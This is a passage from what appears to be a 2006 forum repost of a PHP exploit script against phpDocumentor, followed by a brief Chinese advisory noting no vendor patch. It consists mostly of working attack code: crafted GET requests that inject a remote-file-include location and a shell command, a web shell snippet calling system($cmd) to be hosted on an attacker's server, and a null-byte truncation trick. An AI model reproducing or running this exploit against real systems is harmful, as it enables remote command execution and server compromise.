$path=str_replace(\"\r\n\",\"\",$path);\n $CMD=urlencode($CMD);\n\n $packet=\"GET \".$p.\"Documentation/tests/bug-559668.php?cmd=\".$CMD.\"&FORUM[LIB]=\".$LOC \nATION.\" HTTP/1.1\r\n\"; $packet.=\"User-Agent: Shareaza v1.x.x.xx\r\n\";\n $packet.=\"Host: \".$host.\"\r\n\";\n $packet.=\"Connection: Close\r\n\r\n\";\n show($packet);\n //sendpacketii($packet);\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded\"; die;}\n else {echo \"Trying Step 2...<br>\";}\n\n $packet=\"GET \".$p.\"docbuilder/file_dialog.php?cmd=\".$CMD.\"&root_dir=\".$LOCATION.\" \nHTTP/1.1\r\n\"; $packet.=\"User-Agent: SnoopRob/x.x\r\n\";\n $packet.=\"Host: \".$host.\"\r\n\";\n $packet.=\"Connection: Close\r\n\r\n\";\n show($packet);\n sendpacketii($packet);\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded\"; }\n else {echo \"Exploit failed...\";}\n}\nelse\n{echo \"Note: on remote location prepare this code in<br>\n http:/[remote_location]/classes/db/PearDb.php/index.html<br>\n and in<br>\n http://[remote_location]/phpDocumentor/common.inc.php/index.html:<br>\";\necho nl2br(htmlentities(\"\n <?php\n echo\"HiMaster!\";ini_set(\"max_execution_time\",0);system($cmd);\n ?>\n \" );\n echo \"<br>Note 2: if magic_quotes_off on target server<br>\n you can truncate location name with a null char, ex.:<br>\n http://[remote_location]/your_file.txt%00<br><br>\n Fill * required fields, optionally specify a proxy...\";}\n\n?>\n\n建议:\n--------------------------------------------------------------------------------\n厂商补丁:\n\nPhpDocumentor\n-------------\n目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:\n\nhttp://www.phpdoc.org/\n\n[ 本帖最后由 freeadmin 于 2006-1-4 06:53 AM 编辑 ] |
|